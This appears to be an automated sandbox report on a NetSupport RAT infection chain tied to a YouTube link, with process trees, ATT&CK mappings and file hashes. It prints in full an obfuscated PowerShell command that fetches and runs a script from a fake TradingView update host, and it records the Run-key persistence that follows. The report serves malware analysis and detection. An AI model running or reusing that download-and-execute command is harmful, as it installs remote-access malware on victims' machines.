netsupport | hxxp://www[.]youtube[.]com/watch?v=Qabajxy0OKY

Analysis

max time kernel
145s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-10-2024 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://www.youtube.com/watch?v=Qabajxy0OKY

Score

10^/10

netsupport discovery execution persistence rat

Malware Config

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
210	5160	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
5140	powershell.exe
5160	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

Processes:

z.execlient32.exe

pid	Process
1508	z.exe
2280	client32.exe

Loads dropped DLL 6 IoCs

Processes:

z.execlient32.exe

pid	Process
1508	z.exe
2280	client32.exe
2280	client32.exe
2280	client32.exe
2280	client32.exe
2280	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Support = "C:\\Users\\Admin\\AppData\\Roaming\\Ns\\client32.exe"	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

z.execlient32.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133741094003142278"	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3756129449-3121373848-4276368241-1000\{C38A1055-CF48-49F4-9EBE-11231B87DE09}	chrome.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exechrome.exe

pid	Process
3876	chrome.exe
3876	chrome.exe
5720	powershell.exe
5720	powershell.exe
5720	powershell.exe
5140	powershell.exe
5140	powershell.exe
5140	powershell.exe
5160	powershell.exe
5160	powershell.exe
5160	powershell.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid	Process
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exeAUDIODG.EXE

description	pid	Process
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: 33	3248	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3248	AUDIODG.EXE
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe
Token: SeShutdownPrivilege	3876	chrome.exe
Token: SeCreatePagefilePrivilege	3876	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.execlient32.exe

pid	Process
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
2280	client32.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	Process
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe
3876	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	Process	procid_target
PID 3876 wrote to memory of 3488	3876	chrome.exe	84
PID 3876 wrote to memory of 3488	3876	chrome.exe	84
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 456	3876	chrome.exe	85
PID 3876 wrote to memory of 3424	3876	chrome.exe	86
PID 3876 wrote to memory of 3424	3876	chrome.exe	86
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87
PID 3876 wrote to memory of 3000	3876	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://www.youtube.com/watch?v=Qabajxy0OKY
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd0c6bcc40,0x7ffd0c6bcc4c,0x7ffd0c6bcc58
  2⤵
  PID:3488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=276,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1876 /prefetch:2
  2⤵
  PID:456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2152 /prefetch:3
  2⤵
  PID:3424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2384 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3060 /prefetch:1
  2⤵
  PID:1440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3052,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4344,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4336 /prefetch:1
  2⤵
  PID:892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3420,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:1
  2⤵
  PID:3528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4932,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4960 /prefetch:8
  2⤵
  PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3288,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3084 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5064,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5268 /prefetch:8
  2⤵
  PID:1732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4600,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4568,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:4860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4000,i,705452038865894124,91667307262268304,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5300 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5536

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2868

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4ec 0x480
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -ExecutionPolicy Bypass -Command "='https://'; ='developer'; ='tradingview'; ='update'; ='.php'; =+++'.com/'++; ='TradingView'; =Invoke-WebRequest -Uri -UseBasicParsing -UserAgent ; =[System.Text.Encoding]::UTF8.GetString(.Content); IEX "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5140

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:4352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='developer'; $update='tradingview'; $dev='update'; $beta='.php'; $charts=$AI+$mode+$update+'.com/'+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  PID:5160
- - C:\Users\Admin\AppData\Roaming\z.exe
    "C:\Users\Admin\AppData\Roaming\z.exe" x b.vue -pkek -aoa -y
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1508
- - C:\Users\Admin\AppData\Roaming\Ns\client32.exe
    "C:\Users\Admin\AppData\Roaming\Ns\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
61f11770360132af9a6547c56d5f631f

SHA1
5fee19901ea2a3865147ea133299d98027387815

SHA256
b424804c73f631fceff90ea0aef895b42b721cb46658625e923e0b962d9be984

SHA512
82867903a9acdebf9adf68c52d404bd6df6ca52125a4a865c5516578357c3812da827fe12f9e977154bfeed3f176f231b28165bdcfd33abc15c6336aa17f4837

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

Filesize
233KB

MD5
16577463d9bb40760131eb25ac5ff015

SHA1
be7e5af099da5d9b74a056f96670a7197e776f5e

SHA256
55ceae3dd36e66be4afc97d005ebcbe04ce90f2d5852a8e0924f6a67ea9de95b

SHA512
2b7e5c9ddde83664e76e9280488bfa3ddcd85c8877345ae2be17d7ab2c07833143e3a682ead9e4af049e2bc0e56fb7cfbd49423be965e185cb4a7d3e7996833d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
32KB

MD5
dc8c7092c6366ba7cc8f3e317e9bd170

SHA1
77a2507044c17599c9548e5b6c967ed46643bf3a

SHA256
93fd1b31d4e1b3782528056019b8ab02f0e1fdacc7cc7ad8a3d5f8d15a3ed021

SHA512
9aa9847c60f9f0491703d374b6f5f81022ebd73cda8bb8a03ee55d71258eeecf3815428e3e71a2e25448f780efa097d1e097e8b65a41d69678277dfa3307fc2c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

Filesize
33KB

MD5
d0f78a74c1bb568046d8d06001c11302

SHA1
62ab55bdc5cead63eb1d70c3e7087a1801799697

SHA256
4a1789cc158766e379c6b83616eafcea1a9a4697390394060957daaf36e1b565

SHA512
c7bb0c248ed06d9a3bfc4953cdf135f992d76948ecc0ebf7857d73f43e3cde4ca24420f300dace4f6688f2c033a3c9d0fcfe14a26945a04bd04eb2d94b52f747

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

Filesize
24KB

MD5
ecbdf4f835a82a1150807aa8e319374f

SHA1
a416b60e34c2468fb809790e844590689f0d269f

SHA256
cfc1ee6fda3a799b54c2631c5c080cb945a89e14ccd72fd1a676252f83125557

SHA512
2e45d0baa0dcf5db32533910ccf9688f7c7f67ec9fba17c23ed4efea88406aead61e41408ea4b2849e3e4a08b70920171a2d9967d59190b90f61ab84ee4ca3f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
840B

MD5
22765b988251a1937be44e05ca566456

SHA1
37e806e6ed7bd98044c36e49c1e233b513de6b97

SHA256
09c6334203be25b06a57c27bef916c53575db4001a8a40d95543e1664449b2f9

SHA512
76f4beb87963a9378ca14dfae92b4a229bb779e6d2a6f1fcfef74b6ec8c35cdf38871c7c8b9532a9d6eb7894069fda5b1ef2a9b0d0a9b8a8f8eb837752e1fdd5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
9KB

MD5
5ceab7c97dc76e3b89b8356fdc2a9a0d

SHA1
48d227fb3db4dbd060d23b841e38108af4bb5dc5

SHA256
1e6c627769193741f3db272bd0cefb57cbd23d21189a2866e2e643cc32b1b9bc

SHA512
31ff6be805d66fd63804057ff0567928efa8324cacbe3d3c04401beeb3cede02042c7a2cbdacec68130b3482008d572ddc9ab36c117263038159a19210b47ba0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
8KB

MD5
e58bb9cce2fc8c3ad1d86eba7647fcb1

SHA1
333eded230d8b778abba7e3e4e3ed907ceee00fc

SHA256
a75b0a0fc0e125eaccaa7ffa5f2106a98a3c89902171c1493e36c85838baebbd

SHA512
3992154d7f8d1433fb375280a8b6d0d701563208da6f6f1d985900c587453310a778bd39f882655a8dac89f069fcc56125cbc5d7345fbce21839e9fe486f4538

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
3e2206859c684e478f28ec2a52d490d4

SHA1
f45a4e1b440a684b5422297896b664d415356f83

SHA256
6b0467506eed9f9a73723fc4ce5140829666a62e2bab955055d7eda53dc1887e

SHA512
e9efb95d5ee6adb842f501107882e062ec6516112d4be62d7a0fcc485af141596a490d8e64b7bae8095e25c077231edffb84d51634561189ac3294a43fa52094

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
e77f170721d33258a4aa41f7ca7ef7a9

SHA1
e21e1514101963d4e922a0f91df1e2c83099ef0d

SHA256
d4ca94d086aaf895ae36c1df17fdb194c6493fb1170dbd13c01c37e533f01d67

SHA512
d6abe10b9c0f2668e9c9e2660cf3f875164ddb99a570e7ec1bf7c41792ee3918a4fedb08d1d479e7368c58a58fc1f48a671a4d52e3eca9ba4aa2f5bbb0585d2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
6ffba10c6bd10329973bb4f101796bd4

SHA1
4562b10d63221e4a9049705b0aa814a2532b1b26

SHA256
6bd5f46eb2cb4b8e239ebe58e7ec99b3ba7ff1d7d4233b229b37f634ce6d0152

SHA512
8e299c12707eb5f94efcfad3d3879a46cc8b8a19e36260c1f938a3d8c88b57ffd5fc174a10edf3d0240b484736e9b00902c3e151114c77690b5523607b16540f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
ca12cfa7cd9f504a02540b06ca920388

SHA1
fb5f6cf5e363ff1e46e57a6a01a1edb8c741d555

SHA256
f1387af29d4bad81e059a78a0e7ef2c23f3dff0c6fcc02dbc062cff50fc97a80

SHA512
672885b1e49b03ce33f2d57978557cd889e9d0cdd7d71a3615afd982b147abb6a9a348126d0093b5031eb2b262ad5a41899d5f639af881b6212a45b4a804c7de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
